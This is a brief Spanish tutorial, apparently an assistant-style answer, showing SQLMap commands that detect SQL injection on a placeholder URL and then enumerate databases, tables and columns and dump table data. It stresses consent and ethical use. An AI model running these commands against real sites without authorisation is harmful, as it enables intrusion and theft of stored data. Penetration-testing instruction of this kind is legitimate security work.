SQLMap es una popular herramienta de código abierto utilizada para automatizar pruebas de penetración relacionadas con inyecciones de SQL. Se utiliza para detectar y explotar vulnerabilidades de inyección de SQL en aplicaciones web Sin embargo, es importante enfatizar que solo debe usarse de manera ética, con el consentimiento del propietario del sistema y con fines de prueba de seguridad legÃtimos.
Aquà tienes algunos ejemplos básicos de cómo utilizar SQLMap para detectar y explotar una vulnerabilidad de inyección de SQL:
- Detectar una inyección de SQL:
sqlmap -u "http://www.example.com/page.php?id=1"
Este comando intenta detectar una vulnerabilidad de inyección de SQL en el parámetro "id" de la URL proporcionada.
- Enumerar las bases de datos:
sqlmap -u "http://www.example.com/page.php?id=1" --dbs
Este comando enumera las bases de datos disponibles una vez que SQLMap ha detectado una vulnerabilidad de inyección de SQL.
- Enumerar tablas en una base de datos:
sqlmap -u "http://www.example.com/page.php?id=1" -D dbname --tables
Reemplaza "dbname" por el nombre de la base de datos detectada en el paso anterior. Este comando enumera las tablas disponibles en la base de datos especificada.
- Enumerar columnas de una tabla:
sqlmap -u "http://www.example.com/page.php?id=1" -D dbname -T tablename --columns
Reemplaza "dbname" por el nombre de la base de datos y "tablename" por el nombre de la tabla obtenidos en los pasos anteriores. Este comando enumera las columnas disponibles en la tabla especificada.
- Obtener datos de una tabla:
sqlmap -u "http://www.example.com/page.php?id=1" -D dbname -T tablename -C columnname --dump
Reemplaza "dbname", "tablename" y "columnname" por los nombres de la base de datos, tabla y columna obtenidos en los pasos anteriores. Este comando extrae y muestra los datos de la columna especificada.
Recuerda que debes utilizar SQLMap de manera ética y responsable, asegurándote de obtener el permiso adecuado antes de realizar pruebas de penetración en cualquier aplicación web.